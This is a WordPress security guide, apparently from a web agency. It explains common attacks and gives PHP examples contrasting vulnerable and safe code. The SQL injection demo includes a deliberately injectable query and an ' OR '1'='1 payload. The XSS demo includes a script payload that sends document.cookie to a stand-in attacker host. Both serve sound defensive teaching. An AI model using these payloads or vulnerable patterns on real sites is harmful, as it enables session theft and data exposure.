The Only WordPress Security Guide You Need

Website security is a major concern for us, and since we work mostly with WordPress, this guide focuses on WordPress. We have seen sites stay offline for months because of one small lapse in security. Paying for ongoing security can feel expensive, but it becomes essential as your site gains traffic. Below we lay out the simplest ways to keep a WordPress site secure, give a run-down of the attacks we see most often, and include a few concrete checks you can perform yourself. Let's start with the kinds of vulnerability your site might have.

Common WordPress Intrusions
There are a few types of intrusion we see again and again: nulled plugins and themes, SQL injection, cross-site scripting (XSS), brute-force login attacks, DDoS attacks, and vulnerable or outdated themes. Here is a brief overview of each and how it happens.

The simplest to explain is nulled themes and plugins. A "nulled" theme or plugin is a pirated copy of a paid product with its licence check removed, distributed through unofficial sites. Whoever repackaged it frequently adds a backdoor or other malware, so installing it hands them access to your site; this is the most common route to a plain malware infection. SQL injection happens when user input is pasted into a database query so that it changes what the query does. XSS happens when user-supplied text is written into a page without escaping, so the browser runs it as JavaScript. Brute-force and DDoS attacks both rely on automation and sheer volume of requests, and we break them down in more detail below:

SQL Injection
SQL injection is among the most common attacks on WordPress sites. SQL is the query language WordPress uses to talk to its MySQL database, and an SQL injection attack exploits any input that ends up inside a query without being handled correctly: a comment field, a search box, a contact form, a URL parameter. The attacker types input that closes the quoted value and appends their own SQL, which can read the user table (including password hashes), alter content, or create an administrator account. The real fix is never to build query text by concatenating user input: use parameterised queries, which in WordPress means $wpdb->prepare(). A firewall plugin that blocks known injection patterns is a useful second layer, but it cannot replace correct code in the plugin or theme that handles the input.
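The following is an added example, not code from the original article: the same user lookup written the vulnerable way and the safe way, run against an in-memory SQLite table so it executes offline with the PHP command-line interpreter (it needs the pdo_sqlite extension, bundled with most PHP builds). The table, its rows and the attacker's input are constructed for the demo; in WordPress the safe form is $wpdb->prepare(), which does the same parameter binding.

```php
<?php
// Added example, not code from the original article. Table name, rows and the
// attacker payload are constructed for the demo; $wpdb->prepare() is the
// WordPress equivalent of the prepared statement used in findUserSafe().

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)');
$db->exec("INSERT INTO wp_users (user_login, user_pass) VALUES
           ('admin', 'hash-placeholder-1'), ('editor', 'hash-placeholder-2')");

// VULNERABLE: the request parameter is spliced straight into the SQL text,
// so a quote character in it ends the string and the rest is parsed as SQL.
function findUserVulnerable(PDO $db, string $login): array
{
    $sql = "SELECT ID, user_login, user_pass FROM wp_users WHERE user_login = '$login'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// SAFE: the value is bound as a parameter, so the database only ever sees it
// as data and a quote inside it cannot change the structure of the query.
function findUserSafe(PDO $db, string $login): array
{
    $stmt = $db->prepare('SELECT ID, user_login, user_pass FROM wp_users WHERE user_login = ?');
    $stmt->execute([$login]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input, as typed into a login or search field:
// it closes the quoted value and appends an always-true condition.
$payload = "' OR '1'='1";

// The vulnerable query now matches every row and hands back all logins and
// password hashes; the safe query looks for a user literally named
// "' OR '1'='1" and finds nobody.
printf("vulnerable: %d row(s)\n", count(findUserVulnerable($db, $payload)));
printf("safe:       %d row(s)\n", count(findUserSafe($db, $payload)));
```

The same rule applies to every value that reaches a query, including numeric IDs taken from the URL: bind them, or in WordPress pass them through $wpdb->prepare() with %d and %s placeholders, rather than trusting a cast or a regex to keep them harmless.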

Brute Force Attacks
Brute-force attacks are the least sophisticated intrusion technique and one of the most persistent. A script, or a botnet of many machines, submits password guesses to your login endpoints (wp-login.php and the XML-RPC interface, xmlrpc.php) at a high rate until one works. The attack needs no vulnerability in your site at all, only a weak or reused password, which is why strong passwords and two-factor authentication (covered below) matter so much. The additional defences specific to brute force are to limit login attempts per account and per address, to disable XML-RPC if nothing uses it, and to watch for a sudden rise in failed logins.
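As an added example (not code from the original article, and not any particular plugin's implementation), here is a minimal login throttle of the kind brute-force protection plugins provide. It counts failed attempts per account and source address inside a fixed window and rejects further attempts once the limit is hit, before the password is even checked. State lives in an array so the script runs stand-alone from the command line; on a real site you would persist it (WordPress transients or a database table) and hook it into the authentication step. The attempt log, the address 203.0.113.9 and the limits are constructed for the demo.

```php
<?php
// Added example, not code from the original article. In-memory state and a
// constructed attempt log; the limits are illustrative. Requires PHP 7.4+.

final class LoginThrottle
{
    private const MAX_FAILURES = 5;      // failures allowed inside one window
    private const WINDOW_SECONDS = 900;  // window and lockout length: 15 minutes
    private array $failures = [];        // key => [failure count, first failure time]

    // Keying on login AND address means one address cannot lock a legitimate
    // user out of their own account, but a botnet spreading guesses over many
    // addresses is throttled only per address; see the note after the code.
    private function key(string $login, string $ip): string
    {
        return strtolower($login) . '|' . $ip;
    }

    public function isLocked(string $login, string $ip, int $now): bool
    {
        $k = $this->key($login, $ip);
        if (!isset($this->failures[$k])) {
            return false;
        }
        [$count, $first] = $this->failures[$k];
        if ($now - $first >= self::WINDOW_SECONDS) {
            unset($this->failures[$k]);  // window expired: forget old failures
            return false;
        }
        return $count >= self::MAX_FAILURES;
    }

    public function recordFailure(string $login, string $ip, int $now): void
    {
        $k = $this->key($login, $ip);
        if (!isset($this->failures[$k]) || $now - $this->failures[$k][1] >= self::WINDOW_SECONDS) {
            $this->failures[$k] = [1, $now];  // start a fresh window
            return;
        }
        $this->failures[$k][0]++;
    }

    public function recordSuccess(string $login, string $ip): void
    {
        unset($this->failures[$this->key($login, $ip)]);
    }
}

// Constructed attempt log: an attacker hammering the "admin" account from one
// address, one guess per second. Every guess in this log is wrong.
$throttle = new LoginThrottle();
$t0 = 1700000000;
for ($i = 1; $i <= 7; $i++) {
    $now = $t0 + $i;
    if ($throttle->isLocked('admin', '203.0.113.9', $now)) {
        echo "attempt $i: rejected before the password is checked\n";
        continue;
    }
    // ... the real password check would run here and fail ...
    $throttle->recordFailure('admin', '203.0.113.9', $now);
    echo "attempt $i: wrong password, failure recorded\n";
}

// Once the window has passed, the lock clears and a genuine login can proceed.
var_dump($throttle->isLocked('admin', '203.0.113.9', $t0 + 1 + 900));
```

Whichever key you choose involves a trade-off: throttling by account alone lets an attacker lock your administrator out by deliberately failing, while throttling by address alone does nothing against a botnet. Most plugins combine both with a global limit, and pair the throttle with two-factor authentication so a correct guess is still not enough.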

Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is the injection of attacker-controlled JavaScript into pages your site serves to other users. It is hard to notice after the fact because the server itself looks untouched: the malicious code simply sits in a comment, a profile field, or a stored setting and runs in each visitor's browser. Just as parameterised queries prevent SQL injection, escaping every piece of user-supplied data at the point where it is written into HTML prevents XSS. The site remains a normal, trusted site as far as the visitor's browser is concerned, and that trust is what the attacker borrows: the injected script runs with the same access to the page as your own scripts, and can do anything from inserting adverts to redirecting the visitor to a site that serves malware.
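The following is an added example, not code from the original article: a visitor-supplied comment rendered into HTML, first unescaped (stored XSS) and then escaped at the point of output. PHP's htmlspecialchars() plays the role of WordPress's esc_html() and esc_attr() here so the script runs stand-alone; the comment text and the "attacker.example" address are a constructed payload. It also shows a case escaping alone does not cover, a link whose URL uses the javascript: scheme, because that is the kind of edge that escaping-only advice misses.

```php
<?php
// Added example, not code from the original article. htmlspecialchars() stands
// in for WordPress's esc_html()/esc_attr(); the payload is constructed.

const ESCAPE_FLAGS = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;

// VULNERABLE: whatever the commenter typed is written straight into the page,
// so a <script> tag in the comment becomes part of the document and runs.
function renderCommentVulnerable(string $author, string $body): string
{
    return "<li><b>$author</b>: $body</li>";
}

// SAFE: every user-supplied value is escaped for the HTML text context it
// lands in, so "<" becomes "&lt;" and the browser shows the tag as text.
function renderCommentSafe(string $author, string $body): string
{
    return '<li><b>' . htmlspecialchars($author, ESCAPE_FLAGS, 'UTF-8') . '</b>: '
         . htmlspecialchars($body, ESCAPE_FLAGS, 'UTF-8') . '</li>';
}

// Escaping is context-specific. A value inside an attribute needs ENT_QUOTES
// so a quote cannot break out of the attribute, and a URL needs its scheme
// checked as well: "javascript:alert(1)" contains nothing that HTML escaping
// would touch, yet clicking it runs script.
function renderAuthorLinkSafe(string $url, string $name): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        $url = '#';  // refuse anything that is not a plain web link
    }
    return '<a href="' . htmlspecialchars($url, ESCAPE_FLAGS, 'UTF-8') . '">'
         . htmlspecialchars($name, ESCAPE_FLAGS, 'UTF-8') . '</a>';
}

// Constructed stored-XSS payload: exfiltrates the visitor's cookies.
$payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

echo renderCommentVulnerable('mallory', $payload), "\n";            // script reaches the browser intact
echo renderCommentSafe('mallory', $payload), "\n";                  // rendered as inert text
echo renderAuthorLinkSafe('javascript:alert(1)', 'mallory'), "\n";  // link neutralised
echo renderAuthorLinkSafe('https://example.com/', 'mallory'), "\n"; // normal link kept
```

WordPress core escapes comment bodies and strips disallowed tags from them; the places this goes wrong on real sites are plugins and themes that echo options, query strings, or custom fields without esc_html(), esc_attr(), esc_url() or the equivalent for the context.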

What XSS Means For Your Users
Many site owners assume a serious XSS vulnerability is a problem for the users rather than for the website. But once it is exploited, the attacker's script runs inside your page in every affected visitor's browser: it can rewrite what they see, redirect them elsewhere, capture what they type, and submit requests on behalf of a logged-in editor or administrator. An attacker could in effect redesign your whole site for your visitors without ever touching the server, which is severely damaging to any site and especially to a business. With the severity clear, we can go into more detail.

How Dangerous Can XSS Attacks Be?
XSS issues are often ranked lower than other vulnerabilities found on a site, but the threat from exploiting them is real and pervasive. Browsers do confine JavaScript tightly: a script cannot touch the user's files or install anything by itself, and is limited to what the page it runs in can do.

The real issue arises when that script is used as a stepping stone: it can load further code, redirect the visitor, or inject adverts pointing at sites that serve real malware. The infection does not come from your server, but the visitor will certainly believe your site gave it to them. The arbitrary nature of XSS is what makes it so dangerous: you may not spot the first person slipping in adverts to make a quick dollar, but when the same hole is used for a full-scale malware campaign, you had better be able to fix it fast.

DDoS Attacks
A distributed denial-of-service (DDoS) attack is one of the most common attacks on websites. Many machines send requests to the site in huge numbers in a short time, and the usual effect is that the site goes down because the web server, or its network connection, simply cannot serve them all. This kind of attack is best mitigated in front of the server, with a firewall and a content delivery network (CDN) or reverse proxy that absorbs the traffic before it reaches you.

How DDoS Attacks Work
During a DDoS attack a server, website, or network is flooded with requests from many devices in a very short time. Most servers cannot handle the volume: responses slow to a crawl or the service drops entirely. There is no single form of DDoS attack; they vary widely in size and technique, and the two broad categories below cover most of what a website will see.

Volumetric DDoS
Volumetric attacks are the most common type of DDoS and the easiest for a low-skill attacker to launch. They use a botnet of compromised computers, or rented servers, to saturate the bandwidth or connection capacity of the target; connection floods fall into this category. These are the attacks a typical website is most likely to encounter.

Application Layer (OSI Layer 7) Attacks
Application-layer attacks target the web application rather than the network pipe. Instead of raw bandwidth, they send requests that are cheap for the attacker to produce but expensive for the server to answer: search queries, login attempts, XML-RPC calls, or pages that bypass the cache, so that a relatively modest flood exhausts PHP workers and database connections. Large sites see these regularly, and a DDoS of either kind is sometimes used as a smokescreen while the attacker attempts an intrusion or theft elsewhere.

Old WordPress and PHP versions
Outdated WordPress core, plugin, and PHP versions are another major cause of intrusions, and for the most part these fall under the same heading as malware: a publicly known flaw in an old version is easy to exploit, usually automatically, to install malware on the site. Intrusions on outdated installs are typically adware or spyware, which inject malicious advertisements or track your users respectively. The best defence is to keep everything up to date (enable automatic updates for core and plugins where you can, and move off PHP versions that no longer receive security fixes) and to back up the site frequently so you can restore it if an intrusion does happen.

Creating Better Passwords
Your password is the front line of defence for your site. No security system protects you from your own easy-to-guess password. The worst passwords are related to public information about you, or are common dictionary words with a number appended; attackers try those first. The most secure passwords are long and random: either a long random string from a password manager, or a passphrase of several words chosen at random from a large list. Use a different one for every account. That one simple change will save you a lot of grief and prevent your site from being brute-forced or logged into by some random stranger.
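As an added example (not code from the original article), here is how to generate a random passphrase correctly and how to compare its strength with a short password. The important points are that the words are drawn with a cryptographically secure random source, not rand() or mt_rand(), and that strength is measured in bits of entropy, which is what a brute-force attacker has to work through. The 16-word list below is constructed for the demo and is far too small for real use; the figures printed use the size of a typical published wordlist (the EFF large list has 7776 words).

```php
<?php
// Added example, not code from the original article. The wordlist is a
// constructed stand-in; the 7776 figure is the size of the EFF large wordlist.

// Picks $words words uniformly at random from $wordlist and appends a two-digit
// number. random_int() uses the operating system's CSPRNG.
function passphrase(array $wordlist, int $words = 6): string
{
    $picked = [];
    for ($i = 0; $i < $words; $i++) {
        $picked[] = $wordlist[random_int(0, count($wordlist) - 1)];
    }
    return implode('-', $picked) . '-' . random_int(10, 99);
}

// Entropy in bits of $length symbols each chosen uniformly from $alphabetSize
// possibilities: log2(alphabetSize^length). Every extra bit doubles the
// number of guesses a brute-force attacker needs on average.
function entropyBits(int $alphabetSize, int $length): float
{
    return $length * log($alphabetSize, 2);
}

$demoWords = ['anchor', 'basil', 'copper', 'drift', 'ember', 'falcon', 'garnet', 'harbor',
              'ivory', 'juniper', 'kestrel', 'lantern', 'meadow', 'nimbus', 'orchid', 'pebble'];

echo 'example passphrase: ', passphrase($demoWords), "\n";
printf("8 lowercase letters:              %5.1f bits\n", entropyBits(26, 8));
printf("8 chars from 95 printable ASCII:  %5.1f bits\n", entropyBits(95, 8));
printf("6 words from a 7776-word list:    %5.1f bits\n", entropyBits(7776, 6));
printf("6 words from this 16-word list:   %5.1f bits (list is too small)\n", entropyBits(16, 6));
```

The entropy figure only holds if the words really are chosen at random; a phrase you make up yourself, or a dictionary word with "123!" on the end, is guessed from a wordlist long before an attacker has to enumerate the whole space.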

Using an Authenticator
Authenticators keep your site safe from most of the low-level attacks that are common on the web, because a stolen or guessed password is no longer enough on its own. At their core they are a second confirmation of identity, and they take several forms: an app such as Google Authenticator that generates time-based codes, a code sent by SMS, or a hardware key. App-based codes are preferable to SMS, which can be intercepted or redirected. Several WordPress plugins add this to the login form, and the WordPress plugin directory lists them. Use whichever suits you, and the security of your admin accounts improves dramatically.
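The following is an added example, not code from the original article or from any plugin: the time-based one-time password (TOTP, RFC 6238) computation that Google Authenticator and most WordPress two-factor plugins use, written from scratch so you can see what the shared secret and the 30-second window actually do. It is checked against the test vector published in RFC 4226 and RFC 6238 (ASCII secret "12345678901234567890"). The base32 secret JBSWY3DPEHPK3PXP is a constructed demo secret, the same sort of string that the enrolment QR code carries to the phone.

```php
<?php
// Added example, not code from the original article. RFC 4226/6238 HOTP and
// TOTP with a base32 decoder for the secret format authenticator apps use.
// The site secret below is a constructed demo value.

// RFC 4648 base32 decoder: five bits per character, padding ignored.
function base32Decode(string $b32): string
{
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567';
    $bits = '';
    foreach (str_split(strtoupper(rtrim($b32, '='))) as $c) {
        $v = strpos($alphabet, $c);
        if ($v === false) {
            throw new InvalidArgumentException("invalid base32 character: $c");
        }
        $bits .= str_pad(decbin($v), 5, '0', STR_PAD_LEFT);
    }
    $out = '';
    foreach (str_split($bits, 8) as $byte) {
        if (strlen($byte) === 8) {
            $out .= chr(bindec($byte));
        }
    }
    return $out;
}

// HOTP (RFC 4226): HMAC-SHA1 over the 8-byte big-endian counter, then
// "dynamic truncation" picks 4 bytes at an offset given by the last nibble.
function hotp(string $secret, int $counter, int $digits = 6): string
{
    $hash = hash_hmac('sha1', pack('J', $counter), $secret, true);
    $offset = ord($hash[19]) & 0x0f;
    $code = ((ord($hash[$offset]) & 0x7f) << 24)
          | (ord($hash[$offset + 1]) << 16)
          | (ord($hash[$offset + 2]) << 8)
          | ord($hash[$offset + 3]);
    return str_pad((string) ($code % (10 ** $digits)), $digits, '0', STR_PAD_LEFT);
}

// TOTP (RFC 6238): the counter is the number of 30-second steps since the epoch,
// which is why phone and server only need roughly synchronised clocks.
function totp(string $secret, int $unixTime, int $step = 30, int $digits = 6): string
{
    return hotp($secret, intdiv($unixTime, $step), $digits);
}

// Server-side check: accept the current step and one step either side to absorb
// clock drift, and compare in constant time so timing does not leak the code.
function verifyTotp(string $secret, string $submitted, int $unixTime): bool
{
    foreach ([-1, 0, 1] as $skew) {
        if (hash_equals(totp($secret, $unixTime + 30 * $skew), $submitted)) {
            return true;
        }
    }
    return false;
}

// Published test vector: secret "12345678901234567890", T=59 (counter 1).
// RFC 6238 lists the 8-digit code 94287082; the 6-digit code is its last six digits.
$rfcSecret = '12345678901234567890';
var_dump(totp($rfcSecret, 59) === '287082');

// Constructed demo secret in the base32 form shown in enrolment QR codes.
$siteSecret = base32Decode('JBSWY3DPEHPK3PXP');
$now = time();
echo 'code for this 30-second window: ', totp($siteSecret, $now), "\n";
var_dump(verifyTotp($siteSecret, totp($siteSecret, $now), $now));
```

Two practical consequences follow from the code: the secret must be stored on the server as carefully as a password hash, since anyone who reads it can generate valid codes forever, and a code should be accepted only once per window, otherwise an attacker who captures it has a 30-second replay opportunity.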

WordPress Security Conclusion
Now that you are familiar with XSS, DDoS, and the rest, you can begin taking steps to secure your WordPress site before anything is destroyed. Investing in security is always a good investment: don't lose all of your hard work to save a few dollars. Put the time and money into a security plan that defends your site effectively; keeping everything up to date and protected saves an immense amount of time and headache. So get that firewall up, turn on two-factor authentication, and keep an eye out for the risks described above. As always, your friends here at Caveni are happy to help you come up with a plan to keep your website defended, so if you need more help, don't be afraid to contact us.